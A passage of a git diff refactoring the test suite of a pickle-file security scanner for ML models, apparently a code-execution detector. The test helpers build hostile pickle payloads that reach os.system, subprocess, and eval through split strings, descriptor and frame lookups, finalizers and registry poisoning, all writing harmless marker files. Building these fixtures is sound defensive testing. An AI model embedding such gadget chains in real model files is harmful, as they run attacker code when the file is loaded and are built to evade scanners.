return payload[:-1] + b"Parbitrary-storage-key\n0." + + +def _pickleish_tensor_storage_bytes() -> bytes: + # Minimal prefix from pinned PiD raw tensor storage that looks like a pickle FRAME crossing STOP. + return bytes.fromhex("478727be61f70dbd70953cbd09b996bd5c7a2ebe") + (b"\x00" * 128) + + +def _yolov5n6_tensor_storage_prefix_bytes() -> bytes: + # First 64 bytes of Ultralytics/YOLOv5 yolov5n6.pt archive/data/195 at + # revision 5bca797074771ecdfd6267d6e9be32ee201d937b. + return bytes.fromhex( + "4dae5b2ed9a78527072fd82ac529db2d822f181d76258832bd2f39a63527ad2e" + "ba2d3eacd9247fb0a32b1525682aa0253831dc2c4c3085296c2cbcb1f52bea31" + ) + + +def _binary_magic_tensor_storage_bytes() -> bytes: + return b"\x80\x04\x00" + (b"\x00" * 129) + + +def _require_torch_distribution() -> None: + try: + importlib_metadata.distribution("torch") + except importlib_metadata.PackageNotFoundError: + import pytest + + pytest.skip("torch distribution not installed") + + +def _static_getattr_protocol0_unicode_payload() -> bytes: + return b"c__builtin__\ngetattr\ncultralytics.nn.modules.head\nDetect\nVforward\n\x86R." + + +def _clear_ultralytics_modules() -> None: + for module_name in tuple(sys.modules): + if module_name == "ultralytics" or module_name.startswith("ultralytics."): + sys.modules.pop(module_name, None) + + +def _stack_global_reference_payload(protocol: int) -> bytes: + return ( + bytes((0x80, protocol)) + + _short_binunicode(_SHADOW_FRAMEWORK_MODULE.encode("ascii")) + + b"\x94" + + _short_binunicode(_SHADOW_FRAMEWORK_NAME.encode("ascii")) + + b"\x94\x93" + ) + + +def _shadow_slot_state_build_payload() -> bytes: + return ( + _stack_global_reference_payload(4) + + b")\x81N}" + + _short_binunicode(b"payload") + + _short_binunicode(b"owned") + + b"s\x86b." + ) + + +def _make_memo_expansion_pickle(iterations: int, *, inert_writes: int = 0) -> bytes: + total_writes = iterations + inert_writes + if not 1 <= iterations <= 255 or total_writes > 255: + raise ValueError("iterations + inert_writes must fit in BINPUT/BINGET opcodes") + + payload = bytearray(b"\x80\x02)q\x000") + for memo_index in range(1, iterations + 1): + previous_index = memo_index - 1 + payload += b"h" + bytes([previous_index]) + payload += b"h" + bytes([previous_index]) + payload += b"\x86" + payload += b"q" + bytes([memo_index]) + payload += b"0" + for memo_index in range(iterations + 1, total_writes + 1): + payload += b"K\x01" + payload += b"q" + bytes([memo_index]) + payload += b"0" + payload += b"h" + bytes([iterations]) + b"." + return bytes(payload) + + +def _make_pre_memoized_post_budget_stack_global_payload(tail: bytes) -> bytes: + payload = bytearray(b"\x80\x04") + payload += _short_binunicode(b"subprocess") + b"\x94" + payload += _short_binunicode(b"run") + b"\x94" + payload += b"\x880" * 4 + payload += tail + return bytes(payload) + + +def _make_dup_heavy_pickle(iterations: int) -> bytes: + payload = bytearray(b"\x80\x02]q\x00") + for _ in range(iterations): + payload += b"h\x002a0" + payload += b"." + return bytes(payload) + + +def _short_binunicode(data: bytes) -> bytes: + if len(data) > 0xFF: + raise ValueError("SHORT_BINUNICODE helper accepts at most 255 bytes") + return b"\x8c" + bytes([len(data)]) + data + + +def _replace_source_on_read( + monkeypatch: "pytest.MonkeyPatch", source_path: Path, displaced_path: Path, replacement_path: Path +) -> None: + original_read = os.read + replaced = False + + def replace_after_first_read(file_descriptor: int, size: int) -> bytes: + nonlocal replaced + chunk = original_read(file_descriptor, size) + if chunk and not replaced: + replaced = True + source_path.rename(displaced_path) + replacement_path.rename(source_path) + return chunk + + monkeypatch.setattr(os, "read", replace_after_first_read) + + +def _replace_source_after_fstat( + monkeypatch: "pytest.MonkeyPatch", extension_path: Path, displaced_path: Path, replacement_path: Path +) -> None: + original_fstat = os.fstat + fstat_calls = 0 + + def replace_after_second_fstat(file_descriptor: int) -> os.stat_result: + nonlocal fstat_calls + file_stat = original_fstat(file_descriptor) + fstat_calls += 1 + if fstat_calls == 2: + extension_path.rename(displaced_path) + replacement_path.rename(extension_path) + return file_stat + + monkeypatch.setattr(os, "fstat", replace_after_second_fstat) diff --git a/packages/modelaudit-picklescan/tests/parity_corpus.py b/packages/modelaudit-picklescan/tests/parity_corpus.py index 6d8f93d55..ffe4dcda3 100644 --- a/packages/modelaudit-picklescan/tests/parity_corpus.py +++ b/packages/modelaudit-picklescan/tests/parity_corpus.py @@ -9,21 +9,17 @@ import random import string +from framework_fixtures import SystemCommandPayload + from modelaudit_picklescan.options import ScanOptions ParityPayload = tuple[str, bytes, ScanOptions | None] -class MaliciousReducePayload: - """Pickle fixture that reduces to a harmless shell command.""" - - def __reduce__(self) -> tuple[object, tuple[str]]: - return (os.system, ("echo rust parity",)) - - +# Pickle fixture reduces to a harmless shell command. def malicious_reduce_payload() -> bytes: """Return a malicious reduce payload without requiring pickle imports in callers.""" - return pickle.dumps(MaliciousReducePayload(), protocol=4) + return pickle.dumps(SystemCommandPayload("echo rust parity", lambda: os.system), protocol=4) def raw_os_system_reduce_payload() -> bytes: diff --git a/packages/modelaudit-picklescan/tests/pickle_test_helpers.py b/packages/modelaudit-picklescan/tests/pickle_test_helpers.py new file mode 100644 index 000000000..573414858 --- /dev/null +++ b/packages/modelaudit-picklescan/tests/pickle_test_helpers.py @@ -0,0 +1,72 @@ +"""Shared pickle encoders and finding assertions for standalone package tests.""" + +import shlex +from importlib.util import find_spec +from pathlib import Path + +from framework_fixtures import ( + _short_binunicode, +) + +from modelaudit_picklescan import PickleReport, Severity, call_graph + + +def _has_critical_call_graph_finding(report: PickleReport, module: str, name: str, sink: str) -> bool: + return any( + finding.severity == Severity.CRITICAL + and finding.rule_code == "DANGEROUS_CALL_GRAPH" + and finding.details.get("module") == module + and finding.details.get("name") == name + and finding.details.get("sink") == sink + for finding in report.findings + ) + + +def _text_operand(value: str) -> bytes: + data = value.encode() + if len(data) <= 0xFF: + return _short_binunicode(data) + return _binunicode(data) + + +def _binunicode(data: bytes) -> bytes: + return b"X" + len(data).to_bytes(4, "little") + data + + +def _global_operand(module: str, name: str) -> bytes: + return _text_operand(module) + _text_operand(name) + b"\x93" + + +def _tuple_payload_operands(operands: list[bytes]) -> bytes: + return b"(" + b"".join(operands) + b"t" + + +def _proto0_string_literal(value: bytes) -> bytes: + literal = value.decode("latin-1").encode("unicode_escape").replace(b"'", b"\\'") + return b"S'" + literal + b"'\n." + + +def _binunicode8(data: bytes) -> bytes: + return b"\x8d" + len(data).to_bytes(8, "little") + data + + +def _clear_call_graph_caches() -> None: + for function in call_graph._SOURCE_SENSITIVE_CACHED_FUNCTIONS: + function.cache_clear() + + +def _shell_command(marker: Path, marker_content: str) -> str: + return f"printf {shlex.quote(marker_content)} > {shlex.quote(str(marker))}" + + +def _bytes_operand(data: bytes) -> bytes: + if len(data) <= 0xFF: + return b"C" + bytes([len(data)]) + data + return b"B" + len(data).to_bytes(4, "little") + data + + +def _has_module(module: str) -> bool: + try: + return find_spec(module) is not None + except ModuleNotFoundError: + return False diff --git a/packages/modelaudit-picklescan/tests/test_adversarial_pickle_oracle.py b/packages/modelaudit-picklescan/tests/test_adversarial_pickle_oracle.py index 54581c8e0..34cf0df39 100644 --- a/packages/modelaudit-picklescan/tests/test_adversarial_pickle_oracle.py +++ b/packages/modelaudit-picklescan/tests/test_adversarial_pickle_oracle.py @@ -22,6 +22,15 @@ from pathlib import Path import pytest +from pickle_test_helpers import ( + _binunicode, + _binunicode8, + _bytes_operand, + _has_critical_call_graph_finding, + _short_binunicode, + _text_operand, +) +from pickle_test_helpers import _has_module as _module_available import modelaudit_picklescan.call_graph as call_graph from modelaudit_picklescan import PickleReport, SafetyVerdict, ScanOptions, ScanStatus, Severity, scan_bytes @@ -43,6 +52,17 @@ MemoOpcodeBuilder = Callable[[int], bytes] +def _install_mailbox_entrypoint_gap(monkeypatch: pytest.MonkeyPatch, blocked_entrypoint: str, message: str) -> None: + original_entrypoints = call_graph._safe_call_graph_entrypoints + + def flaky_entrypoints(function_name: str) -> tuple[str, ...]: + if function_name == blocked_entrypoint: + raise call_graph._CallGraphAnalysisLimitError(message) + return original_entrypoints(function_name) + + monkeypatch.setattr(call_graph, "_safe_call_graph_entrypoints", flaky_entrypoints) + + def _runtime_before(version: tuple[int, int]) -> bool: return sys.version_info < version @@ -54,34 +74,11 @@ class AdversarialCase: options: ScanOptions | None = None -def _short_binunicode(data: bytes) -> bytes: - if len(data) > 0xFF: - raise ValueError("SHORT_BINUNICODE helper accepts at most 255 bytes") - return b"\x8c" + bytes([len(data)]) + data - - -def _binunicode(data: bytes) -> bytes: - return b"X" + len(data).to_bytes(4, "little") + data - - def _encoded_probe_limit_decoy_literal() -> str: decoys = "".join(f"gAR9Lg==-decoy-{index}|" for index in range(64)) return f"{decoys}Y29zCnN5c3RlbQopUi4={'A' * 65}" -def _text_operand(value: str) -> bytes: - data = value.encode() - if len(data) <= 0xFF: - return _short_binunicode(data) - return _binunicode(data) - - -def _bytes_operand(data: bytes) -> bytes: - if len(data) <= 0xFF: - return b"C" + bytes([len(data)]) + data - return b"B" + len(data).to_bytes(4, "little") + data - - def _int_operand(value: int) -> bytes: if 0 <= value <= 0xFF: return b"K" + bytes([value]) @@ -90,10 +87,6 @@ def _int_operand(value: int) -> bytes: raise ValueError("test pickle helper only supports BININT1/BININT operands") -def _binunicode8(data: bytes) -> bytes: - return b"\x8d" + len(data).to_bytes(8, "little") + data - - def _unicode(data: bytes) -> bytes: return b"V" + data + b"\n" @@ -312,13 +305,6 @@ def _build_adversarial_cases() -> list[AdversarialCase]: ADVERSARIAL_CASES = _build_adversarial_cases() -def _module_available(module_name: str) -> bool: - try: - return find_spec(module_name) is not None - except ModuleNotFoundError: - return False - - def _module_global_available(module_name: str, name: str) -> bool: try: module = import_module(module_name) @@ -434,17 +420,6 @@ def _has_critical_global_finding(report: PickleReport, module: str, name: str) - ) -def _has_critical_call_graph_finding(report: PickleReport, module: str, name: str, sink: str) -> bool: - return any( - finding.severity == Severity.CRITICAL - and finding.rule_code == "DANGEROUS_CALL_GRAPH" - and finding.details.get("module") == module - and finding.details.get("name") == name - and finding.details.get("sink") == sink - for finding in report.findings - ) - - def _has_critical_call_graph_limit_finding(report: PickleReport) -> bool: return any( finding.severity == Severity.CRITICAL @@ -757,17 +732,7 @@ def _has_critical_concurrent_futures_finding(report: PickleReport, name: str) -> def _atexit_register_payload(marker: Path) -> bytes: - parts = [b"\x80\x04"] - parts += [_short_binunicode(b"atexit"), _short_binunicode(b"register"), b"\x93"] - parts += [_short_binunicode(b"pathlib"), _short_binunicode(b"Path.touch"), b"\x93"] - parts += [ - _short_binunicode(b"pathlib"), - _short_binunicode(type(marker).__name__.encode()), - b"\x93(", - ] - parts.extend(_short_binunicode(part.encode()) for part in marker.parts) - parts += [b"tR", b"\x86R."] - return b"".join(parts) + return _touch_callback_payload(marker, module_name=b"atexit", callback_name=b"register") def _weakref_finalize_payload(marker: Path) -> bytes: @@ -803,20 +768,13 @@ def _sched_scheduler_run_payload(marker: Path) -> bytes: def _contextlib_exitstack_close_payload(marker: Path) -> bytes: - parts = [b"\x80\x04"] - parts += [_short_binunicode(b"contextlib"), _short_binunicode(b"ExitStack"), b"\x93)R\x94"] - parts += [_short_binunicode(b"contextlib"), _short_binunicode(b"ExitStack.callback"), b"\x93("] - parts += [b"h\x00"] - parts += [_short_binunicode(b"pathlib"), _short_binunicode(b"Path.touch"), b"\x93"] - parts += [ - _short_binunicode(b"pathlib"), - _short_binunicode(type(marker).__name__.encode()), - b"\x93(", - ] - parts.extend(_short_binunicode(part.encode()) for part in marker.parts) - parts += [b"tR", b"tR0"] - parts += [_short_binunicode(b"contextlib"), _short_binunicode(b"ExitStack.close"), b"\x93h\x00\x85R."] - return b"".join(parts) + return _callback_owner_payload( + marker, + module_name=b"contextlib", + class_name=b"ExitStack", + callback_name=b"ExitStack.callback", + close_name=b"ExitStack.close", + ) def _contextlib_exitstack_enter_context_payload(marker: Path, *, include_call: bool) -> bytes: @@ -874,24 +832,9 @@ def _types_methodtype_bound_method_payload(marker: Path, *, include_call: bool) def _types_dynamicclassattribute_get_payload(marker: Path, *, include_call: bool) -> bytes: - parts = [b"\x80\x04"] - parts += [_short_binunicode(b"types"), _short_binunicode(b"DynamicClassAttribute"), b"\x93"] - parts += [_short_binunicode(b"pathlib"), _short_binunicode(b"Path.touch"), b"\x93"] - parts += [b"\x85R\x94"] - if include_call: - parts += [_short_binunicode(b"types"), _short_binunicode(b"DynamicClassAttribute.__get__"), b"\x93"] - parts += [b"h\x00"] - parts += [ - _short_binunicode(b"pathlib"), - _short_binunicode(type(marker).__name__.encode()), - b"\x93(", - ] - parts.extend(_text_operand(part) for part in marker.parts) - parts += [b"tR", b"\x86R"] - else: - parts += [b"h\x00"] - parts += [b"."] - return b"".join(parts) + return _property_descriptor_payload( + marker, include_call=include_call, module_name=b"types", class_name=b"DynamicClassAttribute" + ) def _functools_cached_property_get_payload(marker: Path, *, include_call: bool) -> bytes: @@ -1291,22 +1234,14 @@ def _string_formatter_get_field_eval_payload(marker: Path, *, include_lookup: bo "]", ] - def join_fragments(fragments: list[str]) -> list[bytes]: - return [ - _global_operand("builtins", "str.join"), - _text_operand(""), - _tuple_payload_operands([_text_operand(fragment) for fragment in fragments]), - b"\x86R", - ] - parts = [b"\x80\x04"] if include_lookup: parts += [_global_operand("string", "Formatter"), b")R\x940"] parts += [_global_operand("string", "Formatter.get_field"), b"(", b"h\x00"] - parts += join_fragments(field_fragments) + parts += _join_fragment_operands(field_fragments) parts += [_tuple_payload_operands([_global_operand("statistics", "mean")]), b"}tR\x940"] parts += [_global_operand("operator", "getitem"), b"h\x01K\x00\x86R\x940"] - parts += join_fragments(code_fragments) + parts += _join_fragment_operands(code_fragments) if include_lookup: parts += [b"\x940h\x02h\x03\x85R"] parts += [b"."] @@ -1318,22 +1253,14 @@ def _unittest_mock_get_target_eval_payload(marker: Path, *, include_lookup: bool code_fragments = [code[offset : offset + 18] for offset in range(0, len(code), 18)] target_fragments = ["builtins:ev", "al", ".x"] - def join_fragments(fragments: list[str]) -> list[bytes]: - return [ - _global_operand("builtins", "str.join"), - _text_operand(""), - _tuple_payload_operands([_text_operand(fragment) for fragment in fragments]), - b"\x86R", - ] - parts = [b"\x80\x04"] if include_lookup: parts += [_global_operand("unittest.mock", "_get_target")] - parts += join_fragments(target_fragments) + parts += _join_fragment_operands(target_fragments) parts += [b"\x85R\x940"] parts += [_global_operand("operator", "getitem"), b"h\x00K\x00\x86R\x940"] parts += [b"h\x01)R\x940"] - parts += join_fragments(code_fragments) + parts += _join_fragment_operands(code_fragments) if include_lookup: parts += [b"\x940h\x02h\x03\x85R"] parts += [b"."] @@ -1344,27 +1271,19 @@ def _static_member_descriptor_builtins_eval_payload(marker: Path, *, include_loo code = f"open({str(marker)!r},'w').write('owned-by-descriptor-static')" code_fragments = [code[offset : offset + 18] for offset in range(0, len(code), 18)] - def join_fragments(fragments: list[str]) -> list[bytes]: - return [ - _global_operand("builtins", "str.join"), - _text_operand(""), - _tuple_payload_operands([_text_operand(fragment) for fragment in fragments]), - b"\x86R", - ] - parts = [b"\x80\x04"] if include_lookup: parts += [_global_operand("inspect", "getattr_static")] parts += [_global_operand("statistics", "mean")] - parts += join_fragments(["_", "_", "builtins", "_", "_"]) + parts += _join_fragment_operands(["_", "_", "builtins", "_", "_"]) parts += [b"\x86R\x940"] parts += [_global_operand("types", "MemberDescriptorType.__get__")] parts += [b"h\x00", _global_operand("statistics", "mean"), b"\x86R\x940"] parts += [_global_operand("builtins", "dict.get")] parts += [b"h\x01"] - parts += join_fragments(["ev", "al"]) + parts += _join_fragment_operands(["ev", "al"]) parts += [b"\x86R\x940"] - parts += join_fragments(code_fragments) + parts += _join_fragment_operands(code_fragments) if include_lookup: parts += [b"\x940h\x02h\x03\x85R"] parts += [b"."] @@ -1375,30 +1294,22 @@ def _wrapper_descriptor_getattribute_eval_payload(marker: Path, *, include_looku code = f"open({str(marker)!r},'w').write('owned-by-wrapper-descriptor')" code_fragments = [code[offset : offset + 18] for offset in range(0, len(code), 18)] - def join_fragments(fragments: list[str]) -> list[bytes]: - return [ - _global_operand("builtins", "str.join"), - _text_operand(""), - _tuple_payload_operands([_text_operand(fragment) for fragment in fragments]), - b"\x86R", - ] - parts = [b"\x80\x04"] if include_lookup: parts += [_global_operand("inspect", "getattr_static")] parts += [_global_operand("statistics", "mean")] - parts += join_fragments(["_", "_", "getattribute", "_", "_"]) + parts += _join_fragment_operands(["_", "_", "getattribute", "_", "_"]) parts += [b"\x86R\x940"] parts += [_global_operand("types", "WrapperDescriptorType.__get__")] parts += [b"h\x00", _global_operand("statistics", "mean"), b"\x86R\x940"] parts += [b"h\x01"] - parts += join_fragments(["_", "_", "builtins", "_", "_"]) + parts += _join_fragment_operands(["_", "_", "builtins", "_", "_"]) parts += [b"\x85R\x940"] parts += [_global_operand("builtins", "dict.get")] parts += [b"h\x02"] - parts += join_fragments(["ev", "al"]) + parts += _join_fragment_operands(["ev", "al"]) parts += [b"\x86R\x940"] - parts += join_fragments(code_fragments) + parts += _join_fragment_operands(code_fragments) if include_lookup: parts += [b"\x940h\x03h\x04\x85R"] parts += [b"."] @@ -1409,24 +1320,16 @@ def _legacy_bound_getattribute_eval_payload(marker: Path, *, include_lookup: boo code = f"open({str(marker)!r},'w').write('owned-by-bound-function-getattribute')" code_fragments = [code[offset : offset + 19] for offset in range(0, len(code), 19)] - def join_fragments(fragments: list[str]) -> list[bytes]: - return [ - _global_operand("builtins", "str.join"), - _text_operand(""), - _tuple_payload_operands([_text_operand(fragment) for fragment in fragments]), - b"\x86R", - ] - parts = [b"\x80\x04"] if include_lookup: parts += [_legacy_global_operand("statistics", "mean.__getattribute__")] - parts += join_fragments(["_", "_", "builtins", "_", "_"]) + parts += _join_fragment_operands(["_", "_", "builtins", "_", "_"]) parts += [b"\x85R\x940"] parts += [_global_operand("builtins", "dict.get")] parts += [b"h\x00"] - parts += join_fragments(["ev", "al"]) + parts += _join_fragment_operands(["ev", "al"]) parts += [b"\x86R\x940"] - parts += join_fragments(code_fragments) + parts += _join_fragment_operands(code_fragments) if include_lookup: parts += [b"\x940h\x01h\x02\x85R"] parts += [b"."] @@ -1474,14 +1377,6 @@ def _gc_referents_eval_payload(marker: Path, *, include_lookup: bool) -> tuple[b code = f"open({str(marker)!r},'w').write('owned-by-gc-referents')" code_fragments = [code[offset : offset + 3] for offset in range(0, len(code), 3)] - def join_fragments(fragments: list[str]) -> list[bytes]: - return [ - _global_operand("builtins", "str.join"), - _text_operand(""), - _tuple_payload_operands([_text_operand(fragment) for fragment in fragments]), - b"\x86R", - ] - parts = [b"\x80\x04"] if include_lookup: parts += [_legacy_global_operand("gc", "get_referents")] @@ -1491,9 +1386,9 @@ def join_fragments(fragments: list[str]) -> list[bytes]: parts += [b"h\x00", _int_operand(referent_index), b"\x86R\x940"] parts += [_global_operand("builtins", "dict.get")] parts += [b"h\x01"] - parts += join_fragments(["ev", "al"]) + parts += _join_fragment_operands(["ev", "al"]) parts += [b"\x86R\x940"] - parts += join_fragments(code_fragments) + parts += _join_fragment_operands(code_fragments) if include_lookup: parts += [b"\x940h\x02h\x03\x85R"] parts += [b"."] @@ -1502,114 +1397,39 @@ def join_fragments(fragments: list[str]) -> list[bytes]: def _frame_builtins_descriptor_eval_payload(marker: Path, *, include_lookup: bool) -> tuple[bytes, str]: code = f"open({str(marker)!r},'w').write('owned-by-frame-f-builtins')" - code_fragments = [code[offset : offset + 3] for offset in range(0, len(code), 3)] - - def join_fragments(fragments: list[str]) -> list[bytes]: - return [ - _global_operand("builtins", "str.join"), - _text_operand(""), - _tuple_payload_operands([_text_operand(fragment) for fragment in fragments]), - b"\x86R", - ] - - parts = [b"\x80\x04"] - if include_lookup: - parts += [_legacy_global_operand("inspect", "currentframe"), b")R\x940"] - parts += [_legacy_global_operand("types", "FrameType.f_builtins.__get__")] - parts += [b"h\x00\x85R\x940"] - parts += [_global_operand("builtins", "dict.get")] - parts += [b"h\x01"] - parts += join_fragments(["ev", "al"]) - parts += [b"\x86R\x940"] - parts += join_fragments(code_fragments) - if include_lookup: - parts += [b"\x940h\x02h\x03\x85R"] - parts += [b"."] - return b"".join(parts), code + return _frame_builtins_lookup_eval_payload( + code, include_lookup=include_lookup, frame_name="currentframe", descriptor_name="FrameType.f_builtins.__get__" + ) def _frame_builtins_call_suffix_eval_payload(marker: Path, *, include_lookup: bool) -> tuple[bytes, str]: code = f"open({str(marker)!r},'w').write('owned-by-call-suffix')" - code_fragments = [code[offset : offset + 3] for offset in range(0, len(code), 3)] - - def join_fragments(fragments: list[str]) -> list[bytes]: - return [ - _global_operand("builtins", "str.join"), - _text_operand(""), - _tuple_payload_operands([_text_operand(fragment) for fragment in fragments]), - b"\x86R", - ] - - parts = [b"\x80\x04"] - if include_lookup: - parts += [_legacy_global_operand("inspect", "currentframe.__call__"), b")R\x940"] - parts += [_legacy_global_operand("types", "FrameType.f_builtins.__get__.__call__")] - parts += [b"h\x00\x85R\x940"] - parts += [_global_operand("builtins", "dict.get")] - parts += [b"h\x01"] - parts += join_fragments(["ev", "al"]) - parts += [b"\x86R\x940"] - parts += join_fragments(code_fragments) - if include_lookup: - parts += [b"\x940h\x02h\x03\x85R"] - parts += [b"."] - return b"".join(parts), code + return _frame_builtins_lookup_eval_payload( + code, + include_lookup=include_lookup, + frame_name="currentframe.__call__", + descriptor_name="FrameType.f_builtins.__get__.__call__", + ) def _frame_builtins_get_self_alias_eval_payload(marker: Path, *, include_lookup: bool) -> tuple[bytes, str]: code = f"open({str(marker)!r},'w').write('owned-by-get-self')" - code_fragments = [code[offset : offset + 3] for offset in range(0, len(code), 3)] - - def join_fragments(fragments: list[str]) -> list[bytes]: - return [ - _global_operand("builtins", "str.join"), - _text_operand(""), - _tuple_payload_operands([_text_operand(fragment) for fragment in fragments]), - b"\x86R", - ] - - parts = [b"\x80\x04"] - if include_lookup: - parts += [_legacy_global_operand("inspect", "currentframe.__get__.__self__"), b")R\x940"] - parts += [_legacy_global_operand("types", "FrameType.f_builtins.__get__.__self__.__get__")] - parts += [b"h\x00\x85R\x940"] - parts += [_global_operand("builtins", "dict.get")] - parts += [b"h\x01"] - parts += join_fragments(["ev", "al"]) - parts += [b"\x86R\x940"] - parts += join_fragments(code_fragments) - if include_lookup: - parts += [b"\x940h\x02h\x03\x85R"] - parts += [b"."] - return b"".join(parts), code + return _frame_builtins_lookup_eval_payload( + code, + include_lookup=include_lookup, + frame_name="currentframe.__get__.__self__", + descriptor_name="FrameType.f_builtins.__get__.__self__.__get__", + ) def _frame_builtins_repr_self_alias_eval_payload(marker: Path, *, include_lookup: bool) -> tuple[bytes, str]: code = f"open({str(marker)!r},'w').write('owned-by-repr-self')" - code_fragments = [code[offset : offset + 3] for offset in range(0, len(code), 3)] - - def join_fragments(fragments: list[str]) -> list[bytes]: - return [ - _global_operand("builtins", "str.join"), - _text_operand(""), - _tuple_payload_operands([_text_operand(fragment) for fragment in fragments]), - b"\x86R", - ] - - parts = [b"\x80\x04"] - if include_lookup: - parts += [_legacy_global_operand("inspect", "currentframe.__repr__.__self__"), b")R\x940"] - parts += [_legacy_global_operand("types", "FrameType.f_builtins.__get__.__repr__.__self__")] - parts += [b"h\x00\x85R\x940"] - parts += [_global_operand("builtins", "dict.get")] - parts += [b"h\x01"] - parts += join_fragments(["ev", "al"]) - parts += [b"\x86R\x940"] - parts += join_fragments(code_fragments) - if include_lookup: - parts += [b"\x940h\x02h\x03\x85R"] - parts += [b"."] - return b"".join(parts), code + return _frame_builtins_lookup_eval_payload( + code, + include_lookup=include_lookup, + frame_name="currentframe.__repr__.__self__", + descriptor_name="FrameType.f_builtins.__get__.__repr__.__self__", + ) def _site_os_system_payload(command: str, *, include_call: bool) -> bytes: @@ -1682,22 +1502,8 @@ def _scipy_rv_continuous_setstate_payload(marker: Path) -> bytes: "def _parse_args_stats(*args):\n return (), 0, 1\n" "def _parse_args_rvs(*args):\n return (), 0, 1, None\n" ) - state = b"".join( - [ - b"}", - _dict_setitem("_parse_arg_template", _text_operand(parse_arg_template)), - _dict_setitem("numargs", _int_operand(0)), - _dict_setitem("moment_type", _int_operand(0)), - ] - ) - return b"".join( - [ - b"\x80\x04", - _global_operand("scipy.stats._distn_infrastructure", "rv_continuous"), - b")\x81", - state, - b"b.", - ] + return _scipy_setstate_payload( + parse_arg_template, module_name="scipy.stats._distn_infrastructure", class_name="rv_continuous" ) @@ -1708,22 +1514,8 @@ def _scipy_norm_gen_setstate_payload(marker: Path) -> bytes: "def _parse_args_stats(*args):\n return (), 0, 1\n" "def _parse_args_rvs(*args):\n return (), 0, 1, None\n" ) - state = b"".join( - [ - b"}", - _dict_setitem("_parse_arg_template", _text_operand(parse_arg_template)), - _dict_setitem("numargs", _int_operand(0)), - _dict_setitem("moment_type", _int_operand(0)), - ] - ) - return b"".join( - [ - b"\x80\x04", - _global_operand("scipy.stats._continuous_distns", "norm_gen"), - b")\x81", - state, - b"b.", - ] + return _scipy_setstate_payload( + parse_arg_template, module_name="scipy.stats._continuous_distns", class_name="norm_gen" ) @@ -1751,21 +1543,7 @@ def _scipy_stats_norm_singleton_setstate_payload(marker: Path) -> bytes: def _fsspec_registry_poisoning_payload(marker: Path, cache_dir: Path) -> bytes: - def join_fragments(fragments: list[str]) -> bytes: - return b"".join( - [ - _global_operand("builtins", "str.join"), - _tuple_payload_operands( - [ - _text_operand(""), - _list_payload_operands([_text_operand(fragment) for fragment in fragments]), - ] - ), - b"R", - ] - ) - - registry_value = b"}" + _dict_setitem("class", join_fragments(["sub", "process", ".P", "open"])) + registry_value = b"}" + _dict_setitem("class", _join_fragment_payload(["sub", "process", ".P", "open"])) command = f"printf fsspec-registry-owned > {shlex.quote(str(marker))}" target_options = b"}" + _dict_setitem( "args", @@ -1800,27 +1578,14 @@ def join_fragments(fragments: list[str]) -> bytes: def _pydantic_dynamic_imports_payload(marker: Path) -> bytes: - def join_fragments(fragments: list[str]) -> bytes: - return b"".join( - [ - _global_operand("builtins", "str.join"), - _tuple_payload_operands( - [ - _text_operand(""), - _list_payload_operands([_text_operand(fragment) for fragment in fragments]), - ] - ), - b"R", - ] - ) - command = f"printf pydantic-dynamic-import-owned > {shlex.quote(str(marker))}" return b"".join( [ b"\x80\x04", _global_operand("pydantic", "_dynamic_imports"), _dict_setitem( - "Popen", _tuple_payload_operands([_text_operand("pydantic"), join_fragments(["sub", "process"])]) + "Popen", + _tuple_payload_operands([_text_operand("pydantic"), _join_fragment_payload(["sub", "process"])]), ), b"0", _global_operand("pydantic", "Popen"), @@ -2238,18 +2003,7 @@ def _builtins_type_del_finalizer_payload(marker: Path, *, drop_instance: bool) - def _builtins_type_dynamic_del_finalizer_payload(marker: Path, *, drop_instance: bool) -> bytes: - parts = [b"\x80\x04"] - parts += [_short_binunicode(b"builtins"), _short_binunicode(b"type"), b"\x93"] - parts += [b"(", _text_operand("DerivedPath")] - parts += [_short_binunicode(b"pathlib"), _short_binunicode(type(marker).__name__.encode()), b"\x93"] - parts += [b"\x85", b"}", _dynamic_dunder_name_payload("del")] - parts += [_short_binunicode(b"pathlib"), _short_binunicode(b"Path.touch"), b"\x93"] - parts += [b"s", b"tR\x940"] - parts += [b"h\x00", _text_operand(str(marker)), b"\x85R"] - if drop_instance: - parts += [b"0N"] - parts += [b"."] - return b"".join(parts) + return _type_finalizer_payload(marker, drop_instance=drop_instance, constructor_name=b"type") def _builtins_type_dynamic_del_finalizer_overflow_payload(marker: Path, *, drop_instance: bool) -> bytes: @@ -2276,20 +2030,9 @@ def _builtins_type_new_dynamic_del_finalizer_payload( drop_instance: bool, type_value_name: bytes = b"type", ) -> bytes: - parts = [b"\x80\x04"] - parts += [_short_binunicode(b"builtins"), _short_binunicode(b"type.__new__"), b"\x93"] - parts += [b"("] - parts += [_short_binunicode(b"builtins"), _short_binunicode(type_value_name), b"\x93"] - parts += [_text_operand("DerivedPath")] - parts += [_short_binunicode(b"pathlib"), _short_binunicode(type(marker).__name__.encode()), b"\x93"] - parts += [b"\x85", b"}", _dynamic_dunder_name_payload("del")] - parts += [_short_binunicode(b"pathlib"), _short_binunicode(b"Path.touch"), b"\x93"] - parts += [b"s", b"tR\x940"] - parts += [b"h\x00", _text_operand(str(marker)), b"\x85R"] - if drop_instance: - parts += [b"0N"] - parts += [b"."] - return b"".join(parts) + return _type_constructor_finalizer_payload( + marker, drop_instance=drop_instance, type_value_name=type_value_name, constructor_name=b"type.__new__" + ) def _builtins_type_call_dynamic_del_finalizer_payload( @@ -2298,20 +2041,9 @@ def _builtins_type_call_dynamic_del_finalizer_payload( drop_instance: bool, type_value_name: bytes = b"type", ) -> bytes: - parts = [b"\x80\x04"] - parts += [_short_binunicode(b"builtins"), _short_binunicode(b"type.__call__"), b"\x93"] - parts += [b"("] - parts += [_short_binunicode(b"builtins"), _short_binunicode(type_value_name), b"\x93"] - parts += [_text_operand("DerivedPath")] - parts += [_short_binunicode(b"pathlib"), _short_binunicode(type(marker).__name__.encode()), b"\x93"] - parts += [b"\x85", b"}", _dynamic_dunder_name_payload("del")] - parts += [_short_binunicode(b"pathlib"), _short_binunicode(b"Path.touch"), b"\x93"] - parts += [b"s", b"tR\x940"] - parts += [b"h\x00", _text_operand(str(marker)), b"\x85R"] - if drop_instance: - parts += [b"0N"] - parts += [b"."] - return b"".join(parts) + return _type_constructor_finalizer_payload( + marker, drop_instance=drop_instance, type_value_name=type_value_name, constructor_name=b"type.__call__" + ) def _builtins_type_dict_constructor_dynamic_del_finalizer_payload(marker: Path, *, drop_instance: bool) -> bytes: @@ -2464,23 +2196,12 @@ def _builtins_type_dup_alias_mutated_namespace_dynamic_del_finalizer_payload( def _builtins_object_class_dynamic_del_finalizer_payload(marker: Path, *, drop_instance: bool) -> 